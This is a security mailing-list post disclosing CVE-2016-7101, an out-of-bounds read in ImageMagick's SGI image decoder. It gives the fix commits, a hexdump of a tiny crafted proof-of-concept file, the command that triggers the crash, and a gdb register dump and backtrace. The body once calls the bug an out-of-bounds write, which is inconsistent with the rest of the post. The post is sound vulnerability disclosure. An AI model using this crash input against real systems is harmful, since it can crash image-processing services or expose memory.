Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 26 Sep 2016 07:54:24 +0000
From: pwchen(陈佩文) <pwchen@...cent.com>
To: oss-security <oss-security@...ts.openwall.com>
Subject: CVE-2016-7101 - ImageMagick SGI Coder Out-Of-Bounds Read
 Vulnerability

Hi.

This is PeiwenChen of Tencent's Xuanwu Lab & RayZhong of Tencent's Keen Lab.
During our research, we found an Out-Of-Bounds write vulnerability in
 ImageMagick's SGI coder.

When ImageMagick is identifying SGI format image, we can craft a sgi file
with big value of row. It will read a certain number of times which is
controllable by value of row, It cause an Out-Of-Bounds Read.

The ImageMagick team has fixed the vulnerability we reported.


Upstream fix:
https://github.com/ImageMagick/ImageMagick/commit/7afcf9f71043df15508e46f079387bd4689a738d
https://github.com/ImageMagick/ImageMagick/commit/8f8959033e4e59418d6506b345829af1f7a71127

Debian Bug report:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=836776


Attached is a proof of concept and backtrace.

$ hexdump PoC.sgi
0000000 da01 0100 0000 fffe 0200 0400
000000c

$ convert PoC.sgi


Program received signal SIGSEGV, Segmentation fault.
[------------------------registers------------------------]
RAX: 0x0
RBX: 0x1
RCX: 0xf939
RDX: 0x6031b0 --> 0x0
RSI: 0x7ffff7fe8090 --> 0x1
RDI: 0x7ffff7dcef98 --> 0x1
RBP: 0xdfbc
RSP: 0x7fffffff5e60 --> 0xffffffff54535254
RIP: 0x7ffff74eae8b (<IdentifyImageGray+795>: movss  xmm0,DWORD PTR [r15+rax*4])
R8 : 0x744850 --> 0x0
R9 : 0x1
R10: 0x69a000 --> 0x0
R11: 0x1
R12: 0x641600 --> 0x600000000
R13: 0x6535f0 --> 0x1700000001
R14: 0x603178 --> 0x6031b0 --> 0x0

R15: 0x765000                          <== end address of heap

[---------------------------code---------------------------]
   0x7ffff74eae7d <IdentifyImageGray+781>: inc    BYTE PTR [rdx+rcx*1]
   0x7ffff74eae80 <IdentifyImageGray+784>: mov    DWORD PTR [rax],0x5177
   0x7ffff74eae86 <IdentifyImageGray+790>: mov    rax,QWORD PTR [rsp+0x30]
=> 0x7ffff74eae8b <IdentifyImageGray+795>: movss  xmm0,DWORD PTR [r15+rax*4]
   0x7ffff74eae91 <IdentifyImageGray+801>: movaps XMMWORD PTR [rsp+0x40],xmm0
   0x7ffff74eae96 <IdentifyImageGray+806>: mov    rax,QWORD PTR [rsp+0x28]
   0x7ffff74eae9b <IdentifyImageGray+811>: movss  xmm4,DWORD PTR [r15+rax*4]
   0x7ffff74eaea1 <IdentifyImageGray+817>: subss  xmm0,xmm4
[---------------------------stack---------------------------]
00:0000| rsp 0x7fffffff5e60 --> 0xffffffff54535254
01:0008|     0x7fffffff5e68 --> 0x0
02:0016|     0x7fffffff5e70 --> 0x63d600 --> 0x6535f0 --> 0x1700000001
03:0024|     0x7fffffff5e78 --> 0x614160 --> 0x1a9
04:0032|     0x7fffffff5e80 --> 0x0
05:0040|     0x7fffffff5e88 --> 0x1
06:0048|     0x7fffffff5e90 --> 0x0
07:0056|     0x7fffffff5e98 --> 0xfeff
[-----------------------------------------------------------]
Legend: stack, code, data, heap, rodata, value
Stopped reason: SIGSEGV
0x00007ffff74eae8b in IsPixelMonochrome (image=<optimized out>, pixel=<optimized out>) at ./MagickCore/pixel-accessor.h:561
561   red_green=(MagickRealType) pixel[image->channel_map[RedPixelChannel].offset]-

gdb-peda$ bt
#0  0x00007ffff74eae8b in IsPixelMonochrome (image=<optimized out>, pixel=<optimized out>) at ./MagickCore/pixel-accessor.h:561
#1  IdentifyImageGray (image=<optimized out>, exception=<optimized out>) at MagickCore/attribute.c:683
#2  0x00007ffff74ebb7a in IdentifyImageType (image=0x6535f0, exception=0x614160) at MagickCore/attribute.c:821
#3  0x00007ffff7647d39 in IdentifyImage (image=0x6535f0, file=<optimized out>, verbose=<optimized out>, exception=0x614160) at MagickCore/identify.c:494
#4  0x00007ffff71024a6 in IdentifyImageCommand (image_info=<optimized out>, argc=<optimized out>, argv=<optimized out>, metadata=<optimized out>, exception=<optimized out>) at MagickWand/identify.c:336
#5  0x00007ffff7153e53 in MagickCommandGenesis (image_info=<optimized out>, command=<optimized out>, argc=<optimized out>, argv=<optimized out>, metadata=<optimized out>, exception=<optimized out>) at MagickWand/mogrify.c:183
#6  0x0000000000401cae in MagickMain (argc=<optimized out>, argv=<optimized out>) at utilities/magick.c:145
#7  main (argc=<optimized out>, argv=<optimized out>, argv@...ry=0x7fffffffeb48) at utilities/magick.c:176
#8  0x00007ffff5a3b830 in __libc_start_main (main=0x4015f0 <main>, argc=0x2, argv=0x7fffffffeb48, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffeb38) at ../csu/libc-start.c:291
#9  0x0000000000401519 in _start ()


gdb-peda$ vmmap
Start              End                Perm Name
0x00400000         0x00403000         r-xp /usr/local/bin/magick
0x00602000         0x00603000         r--p /usr/local/bin/magick
0x00603000         0x00604000         rw-p /usr/local/bin/magick
0x00604000         0x00765000         rw-p [heap]
0x00007ffff553f000 0x00007ffff5817000 r--p /usr/lib/locale/locale-archive


Regards,
Peiwen Chen
Tencent's Xuanwu Lab

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ